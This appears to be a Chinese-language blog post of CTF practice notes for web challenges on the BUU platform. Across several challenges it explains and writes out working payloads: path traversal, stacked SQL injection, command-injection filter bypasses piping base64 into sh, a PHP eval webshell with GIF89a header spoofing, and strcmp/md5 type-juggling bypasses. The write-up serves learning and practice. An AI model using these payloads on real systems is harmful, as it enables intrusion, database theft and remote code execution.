<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.7.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.7.0" type="image/png" sizes="32x32"><meta name="description" content="这是一篇BUU的刷题笔记；主要记录了一些没遇到过的方法和题型">
<meta property="og:type" content="article">
<meta property="og:title" content="Buu学习笔记1">
<meta property="og:url" content="https://hyggevv.github.io/2022/12/18/buu1/index.html">
<meta property="og:site_name" content="hey&#39;s blog">
<meta property="og:description" content="这是一篇BUU的刷题笔记；主要记录了一些没遇到过的方法和题型">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/1.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/2.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/4.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/5.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/6.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/7.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/8.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/9.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/10.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/11.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/12.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/13.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/14.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/18/buu1/15.png">
<meta property="article:published_time" content="2022-12-18T03:28:12.000Z">
<meta property="article:modified_time" content="2023-04-25T12:36:33.362Z">
<meta property="article:author" content="hey">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hyggevv.github.io/2022/12/18/buu1/1.png"><title>Buu学习笔记1 | hey's blog</title><link ref="canonical" href="https://hyggevv.github.io/2022/12/18/buu1/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.7.0"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: true,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copiar","copySuccess":"Éxito en copia","copyError":"Error en copia"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.2"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Inicio</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archivos</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categorías</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Etiquetas</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-user"></i></span><span class="header-nav-menu-item__text">Sobre Nosotros</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/read/"><span class="header-nav-menu-item__icon"><i class="fas fa-book"></i></span><span class="header-nav-menu-item__text">menu.read</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">hey's blog</div><div class="header-banner-info__subtitle">天气转晴太阳崭新我在前进</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">Buu学习笔记1</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Creado</span><span class="post-meta-item__value">2022-12-18</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Actualizado</span><span class="post-meta-item__value">2023-04-25</span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">Visitado</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h2 id="WEB">
          <a href="#WEB" class="heading-link"><i class="fas fa-link"></i></a><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2>
      
        <h2 id="HCTF-2018-WarmUp">
          <a href="#HCTF-2018-WarmUp" class="heading-link"><i class="fas fa-link"></i></a><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h2>
      <p>打开后发现source.php那么应该是一道代码审计的题目；那我们就看看源码吧；这里我将源码分为两部分；<br><img src="/2022/12/18/buu1/1.png"><br>此时它对我们传入的$page进行一个判断；判断是否为空或者是否为字符串；若是为空或者不是字符串；则返回false；然后若是非空或者为字符串则进行判断$page是否在定义的白名单之内；若是在里面则返回true；然后接者对我们传入的$page进行一个截取并返回一部分；(获取 $page 中 从 0 开始 到 mb_strpos($page . ‘?’,<br>‘?’)结束的字符串);而mb_strpos($page . ‘?’, ‘?’)则是查找$page第一次出现?的位置(关于mb_strpos函数在测试时发现如果没有匹配到指定符号，将返回字符串长度);所以该段总结来说就是对我们传入$page进行一个截取；从第0位到第一次出现?的内容并进行一个白名单匹配;如果该内容在白名单内便返回true；所以我们应该构造&#x2F;suorce.php?或者&#x2F;hint.php?进行白名单匹配。<br><img src="/2022/12/18/buu1/2.png"><br>需要注意REQUEST函数、GET函数与POST函数的区别，REQUEST函数可以同时接受get与post方法提交的变量。<br>这里是主要判断的逻辑，首先判断 file 参数是不是空值，再判断 file 是不是字符串，最后将 file 传入 checkFile 类中再进行判断(传入后 $page&#x3D;$_REQUEST[‘file’])</p>
<p>又因为hint.php提示我们flag下ffffllllaaaagggg中；然后include()函数又会帮我们把内容读出来；所以我们想到构建payload为:?file&#x3D;source.php?ffffllllaaaagggg此时发现没有内容；我们便又想到了目录穿越的方法进行度读取?file&#x3D;source.php?&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;ffffllllaaaagggg进行读取<br>或者?file&#x3D;hint.php?&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;ffffllllaaaagggg</p>

        <h2 id="强网杯-2019-随便注">
          <a href="#强网杯-2019-随便注" class="heading-link"><i class="fas fa-link"></i></a><a href="#强网杯-2019-随便注" class="headerlink" title="[强网杯 2019]随便注"></a>[强网杯 2019]随便注</h2>
      <p>老规矩先提交一个参数试试看；出现了数字1和一个字符串；此时猜测1就类似于sqli-labs里面的id值；<br><img src="/2022/12/18/buu1/4.png"><br>接着探测闭合形式；然后猜字段数；接着使用联合注入试一下；发现有匹配大小写的过滤<br><img src="/2022/12/18/buu1/5.png"><br>接下来试着绕过对select的过滤，发现是进行多次匹配，双写绕过无效，注释绕过无效，url编码绕过无效；应该是绕不过了吧。此时想到了叠堆注入的方法，发现页面有回显，接着继续爆表和列。<br>words表：<br><img src="/2022/12/18/buu1/6.png"><br>1919810931114514表：<br><img src="/2022/12/18/buu1/7.png"><br>此时发现flag在1919810931114514表中，但是因为select无法使用导致我们无法读取<br>法一：我们这时候突然注意到我们提交1时爆出的字段；因为第一个字段也比较像是id值，猜想输出的是words表中的。所以此时我们可以将words表改成别的名字，将1919810931114514表名改成words表名；这样就可以通过查询1爆出words表的值了。<br>1.先将words表改名：<br>rename table words to a;<br>2.改1919810931114514表名：<br>rename table 1919810931114514 to words;<br>3.将flag字段改成data字段：<br>alter table words change flag data varchar(100)<br>4:添加id字段(确保前面的1可以被查询到)<br>alter table words id add int unsigned not Null auto_increment primary key;<br>又因为时叠堆注入可以直接将这几句话连接在一起</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;rename table words to word1;rename table `1919810931114514` to words;alter table words change flag data varchar(100);alter table words add id int unsigned not Null auto_increment primary key;#</span><br></pre></td></tr></table></div></figure>
<p>#注意，如果tableName是纯数字，需要用反引号包裹<br>法二：<br>因为select被过滤了，所以先将select * from <code>1919810931114514</code>进行16进制编码；<br>prepare…from…是预处理语句，会进行编码转换。<br>execute用来执行由SQLPrepare创建的SQL语句。<br>所以构造payload为</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#</span><br></pre></td></tr></table></div></figure>
<p>法三：预编译绕过<br>因为select关键字被过滤了，所以我们可以通过预编译的方式拼接select 关键字；</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;PREPARE hacker from concat(&#x27;s&#x27;,&#x27;elect&#x27;, &#x27; * from `1919810931114514` &#x27;);EXECUTE  hacker;#</span><br></pre></td></tr></table></div></figure>
<p>格式：PREPARE 名称 FROM     Sql语句 ? ;<br>SET @x&#x3D;xx;<br>EXECUTE 名称 USING @x;</p>

        <h2 id="SUCTF-2019-EasySQL">
          <a href="#SUCTF-2019-EasySQL" class="heading-link"><i class="fas fa-link"></i></a><a href="#SUCTF-2019-EasySQL" class="headerlink" title="[SUCTF 2019]EasySQL"></a>[SUCTF 2019]EasySQL</h2>
      <p>这题还是很有必要记录一下的毕竟涉及到了猜测后台的查询语句(好离谱！)<br>在猜测前我们先来了解一下逻辑运算符；&amp;&amp;：都真为真，一假就假  ||：一真就真，都假为假<br>短路语法：<br>a&amp;&amp;b:当a为false时直接输出false(等于说直接输出a)；当a为true时直接输出b<br>a||b:当a为false时直接输出b；当a为true时输出输出true(等于说输出a)<br>接下来开始猜测它后端可以做到数字1回显其他都不回显，那么我们应该想到一定会有一个或结构也就是我们上面说的||；此时便可以猜测后台查询语句为select $a||xx from xx<br>因为你输入1的时候为真；那么便一定是select 1 from tables;而select 1 from tables的作用就是增加新的<br>一列(select任何一个常数都会在表中新建一列，然后查询出那一列的内容;这个也是Array ( [0] &#x3D;&gt; 1 ) );<br><img src="/2022/12/18/buu1/8.png"><br>然后此时我们又想到了* 的作用和在查询表中的字段内容时，逗号,用于查询多个字段名。<br>此时便可以开始构造我们的payload:* ，1<br>此时的后台查询语句就变成了select * ,1||xx from tables;即为select * ,1 from tables<br>附一下后台的查询语句吧感觉这题出题角度有点刁钻了：sql&#x3D;“select”.post[‘query’].”||flag from Flag”;</p>

        <h2 id="GXYCTF2019-Ping-Ping-Ping">
          <a href="#GXYCTF2019-Ping-Ping-Ping" class="heading-link"><i class="fas fa-link"></i></a><a href="#GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="[GXYCTF2019]Ping Ping Ping"></a>[GXYCTF2019]Ping Ping Ping</h2>
      <p>这里想记录一下几种绕过方法(当flag被过滤时,$IFS$1是针对空格和{}被过滤时)：<br>1.变量拼接绕过：?ip&#x3D;127.0.0.1;a&#x3D;g;cat$IFS$1fla$a.php;<br>2.Base64绕过：echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh；主要是后面的|base64 -d|sh<br>3.内敛绕过：?ip&#x3D;127.0.0.1;cat$IFS$1<code>ls</code>；<br>反引号将反引号内命令的输出作为输入执行ls将ls出来的文件作为输入 cat ls</p>

        <h2 id="极客大挑战-2019-Secret-File">
          <a href="#极客大挑战-2019-Secret-File" class="heading-link"><i class="fas fa-link"></i></a><a href="#极客大挑战-2019-Secret-File" class="headerlink" title="[极客大挑战 2019]Secret File"></a>[极客大挑战 2019]Secret File</h2>
      <p><img src="/2022/12/18/buu1/9.png"><br>根据提示此时猜测可能是网页跳转太快咱们没有看清(因为咱们访问的是action.php但是跳转到end.php)此时我们<br>可以借助bp进行查看<br><img src="/2022/12/18/buu1/10.png"><br>此时便出现了刚才没有的东西；然后登入后提示是flag放在flag.php里，咱们马上想到文件包含；然后利用伪协议进行读取</p>

        <h2 id="极客大挑战-2019-Upload">
          <a href="#极客大挑战-2019-Upload" class="heading-link"><i class="fas fa-link"></i></a><a href="#极客大挑战-2019-Upload" class="headerlink" title="[极客大挑战 2019]Upload"></a>[极客大挑战 2019]Upload</h2>
      <p>这边主要想记录一下当&lt;?被过滤时应该咋办此时可通过这样来绕过<script language="pHp">@eval($_POST['wann'])</script>和文件头欺骗(我们通常在一句话木马前加入GIF89a?进行绕过文件头检查)</p>

        <h2 id="极客大挑战-2019-BuyFlag">
          <a href="#极客大挑战-2019-BuyFlag" class="heading-link"><i class="fas fa-link"></i></a><a href="#极客大挑战-2019-BuyFlag" class="headerlink" title="[极客大挑战 2019]BuyFlag"></a>[极客大挑战 2019]BuyFlag</h2>
      <p><img src="/2022/12/18/buu1/11.png"><br>根据提示我们必须是要为该学院的学生，抓个包看看；发现在Cookie: user&#x3D;0；0一般是假的意思；我们把0改成<br>1；然后防包，此时已经提醒我们是该学校的学生了；接下来翻阅源码<br><img src="/2022/12/18/buu1/12.png"><br>接下来介绍两个函数：<br>1.is_numberic():就是判断括号里面的变量是不是数值<br>is_numeric函数对于空字符%00，无论是%00放在前后都可以判断为非数值，而%20空格字符只能放在数值后。<br>2.int strcmp ( string $str1 , string $str2 )<br>参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 &lt; 0； 如果 str1 大于 str2 返回 &gt; 0；如果两者相等，返回 0。<br>可知，传入的期望类型是字符串类型的数据，但是如果我们传入非字符串类型的数据的时候，这个函数将会有怎么样的行为呢？实际上，当这个函数接受到了不符合的类型，这个函数将发生错误，但是在5.3之前的php中，显示了报错的警告信息后，将return 0 ，<br>也就是虽然报了错，但却判定其相等<br>strcmp函数漏洞：strcmp比较的是字符串类型，如果强行传入其他类型参数，会出错，出错后返回值0，正是利用这点进行绕过。<br>比如这段代码</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">define(&#x27;FLAG&#x27;,&#x27;pwnhub&#123;this_is_flag&#125;&#x27;);</span><br><span class="line">if(strcmp($_GET[&#x27;flag&#x27;],FLAG) == 0)&#123;</span><br><span class="line">     echo &quot;success,flag:&quot;.FLAG;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>脚本意思是get到的flag和FLAG的值相等，就可以得到FLAG，但我们都不知道flag值是什么，利用strcmp函数特点尝试使用数组绕过。令flag[]&#x3D;xxx flag[]&#x3D;xxx 》》 strcmp比较出错 》》返回null 》》null&#x3D;&#x3D;0 》》条件成立得到flag<br>可知，传入的期望类型是字符串类型的数据，但是如果我们传入非字符串类型的数据的时候，<br>这个函数将会有怎么样的行为呢？实际上，当这个函数接受到了不符合的类型，这个函数将发生错误，<br>但是在5.3之前的php中，显示了报错的警告信息后，将return 0 ，也就是虽然报了错，但却判定其相等</p>

        <h2 id="BJDCTF-2020-easy-md5">
          <a href="#BJDCTF-2020-easy-md5" class="heading-link"><i class="fas fa-link"></i></a><a href="#BJDCTF-2020-easy-md5" class="headerlink" title="[BJDCTF 2020]easy_md5"></a>[BJDCTF 2020]easy_md5</h2>
      <p>这里想记录一下NSSCTF里面的一题；<br><img src="/2022/12/18/buu1/13.png"><br>当我看到这个显示框的时候第一个想的马上就是SQL注入；结果尝试了一番发现好像没有什么回显；十分的困惑<br>翻看wp后才知道这个就是SQL注入不过是添加了MD5的SQL注入：以下是给出的hint<br>select * from ‘admin’ where password&#x3D;md5($pass,true)<br><img src="/2022/12/18/buu1/14.png"><br>这个时候出现了一个很新的东西md5($pass,true):<br>md5(string,raw):<br>语法：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">string:必需。要计算的字符串。</span><br><span class="line">raw:可选。默认不写为FALSE。32位16进制的字符串;TRUE。16位原始二进制格式的字符串</span><br></pre></td></tr></table></div></figure>
<p>这里如果raw参数为true的话，这个函数的返回值是string的md5加密值进行十六进制解码的字符串。<br>这里需要注意的是，当raw项为true时，返回的这个原始二进制不是普通的二进制（0，1），而是  ‘or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c  这种。所以此题的关键就在于后面的那个true<br>然后我们在SQL注入时知道password&#x3D;xx or 1;后面这个1是恒为真的意思(当然其他数字也可以除了0外)<br>所以我们就要构造一个or number 的类型进行绕过（所以为什么ffifdyop就是答案，因为ffifdyop的md5的原始二进制字符串里面有‘or’6这一部分的字符.）</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">content: ffifdyop</span><br><span class="line">hex: 276f722736c95d99e921722cf9ed621c</span><br><span class="line">raw: &#x27;or&#x27;6\xc9]\x99\xe9!r,\xf9\xedb\x1c</span><br><span class="line">string: &#x27;or&#x27;6]!r,b</span><br></pre></td></tr></table></div></figure>
<p>在mysql里面，在用作布尔型判断时，以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的:<br>比如password&#x3D;‘xxx’ or ‘1xxxxxxxxx’，那么就相当于password&#x3D;‘xxx’ or 1,也就相当于password&#x3D;‘xxx’ or true，所以返回值就是true。当然在我后来测试中发现，不只是1开头，只要是数字开头都是可以的。<br>这边在提一嘴MD5的强弱绕过：数组绕过。原理是md5等函数不能处理数组，导致函数返回Null。而Null是等于Null的，导致了绕过。看下面的示例，是返回了yes的。（题目中便可以传入?a[]&#x3D;1&amp;b[]&#x3D;2进行绕过）</p>

        <h2 id="RoarCTF-2019-Easy-Calc">
          <a href="#RoarCTF-2019-Easy-Calc" class="heading-link"><i class="fas fa-link"></i></a><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h2>
      <p>这题还是很有记录的意义的，先学习几个函数。<br>1.var_dump($expression)：<br>作用：函数用于输出变量的相关信息；显示关于一个或多个表达式的结构信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。<br>语法：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">void var_dump ( mixed $expression [, mixed $... ] )</span><br><span class="line">$expression: 你要输出的变量。</span><br></pre></td></tr></table></div></figure>
<p>例子：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$b = 3.1;</span><br><span class="line">$c = true;</span><br><span class="line">var_dump($b, $c);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">输出结果为：</span><br><span class="line"></span><br><span class="line">float(3.1)</span><br><span class="line">bool(true)</span><br></pre></td></tr></table></div></figure>
<p>2.scandir(directory,sorting_order,context):<br>作用：返回指定目录中的文件和目录的数组。<br>语法：<br>directory   必需。规定要扫描的目录。<br>sorting_order   可选。规定排列顺序。默认是 0，表示按字母升序排列。如果设置为 SCANDIR_SORT_DESCENDING 或者 1，则表示按字母降序排列。如果设置为 SCANDIR_SORT_NONE，则返回未排列的结果。<br>context   可选。规定目录句柄的环境。context 是可修改目录流的行为的一套选项。<br><img src="/2022/12/18/buu1/15.png"><br>var_dump(scandir(chr(47)))，相当于system(ls &#x2F;)，chr(47)&#x3D;”&#x2F;“<br>3.file_get_contents(path,include_path,context,start,max_length) :<br>作用：把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。<br>语法：<br>path  必需。规定要读取的文件。<br>include_path  可选。如果您还想在 include_path（在 php.ini 中）中搜索文件的话，请设置该参数为 ‘1’。<br>context   可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL，则忽略。<br>start   可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。<br>max_length  可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。<br>file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))，相当于file_get_contents(&#x2F;f1agg)即system(cat &#x2F;f1agg)</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ FIN ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Autor: </span><span class="copyright-author__value"><a href="https://hyggevv.github.io">hey</a></span></div><div class="copyright-link"><span class="copyright-link__name">Enlace: </span><span class="copyright-link__value"><a href="https://hyggevv.github.io/2022/12/18/buu1/">https://hyggevv.github.io/2022/12/18/buu1/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">Todos los artículos de este blog están bajo licencia  de <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> a menos que se indique lo contrario</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2022/12/19/%E5%88%9D%E6%8E%A2%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">初识序列化与反序列化</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/12/14/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/"><span class="paginator-prev__text">日常SQL注入笔记</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Contenido</span><span class="sidebar-nav-ov">Reseña</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">
          WEB</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HCTF-2018-WarmUp"><span class="toc-number">2.</span> <span class="toc-text">
          [HCTF 2018]WarmUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="toc-number">3.</span> <span class="toc-text">
          [强网杯 2019]随便注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SUCTF-2019-EasySQL"><span class="toc-number">4.</span> <span class="toc-text">
          [SUCTF 2019]EasySQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GXYCTF2019-Ping-Ping-Ping"><span class="toc-number">5.</span> <span class="toc-text">
          [GXYCTF2019]Ping Ping Ping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Secret-File"><span class="toc-number">6.</span> <span class="toc-text">
          [极客大挑战 2019]Secret File</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Upload"><span class="toc-number">7.</span> <span class="toc-text">
          [极客大挑战 2019]Upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BuyFlag"><span class="toc-number">8.</span> <span class="toc-text">
          [极客大挑战 2019]BuyFlag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BJDCTF-2020-easy-md5"><span class="toc-number">9.</span> <span class="toc-text">
          [BJDCTF 2020]easy_md5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RoarCTF-2019-Easy-Calc"><span class="toc-number">10.</span> <span class="toc-text">
          [RoarCTF 2019]Easy Calc</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/usually.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">hey</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">102</div><div class="sidebar-ov-state-item__name">Archivo</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Categorías</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Etiquetas</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">Has leído </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2024</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>hey</span></div><div><span>Potenciado por <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.2</span><span class="footer__devider">|</span><span>Tema - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.7.0</span></div><div class="busuanzi"><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">Vistas</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script><script src="/js/utils.js?v=2.7.0"></script><script src="/js/stun-boot.js?v=2.7.0"></script><script src="/js/scroll.js?v=2.7.0"></script><script src="/js/header.js?v=2.7.0"></script><script src="/js/sidebar.js?v=2.7.0"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":180,"height":300},"mobile":{"show":true},"log":false});</script></body></html>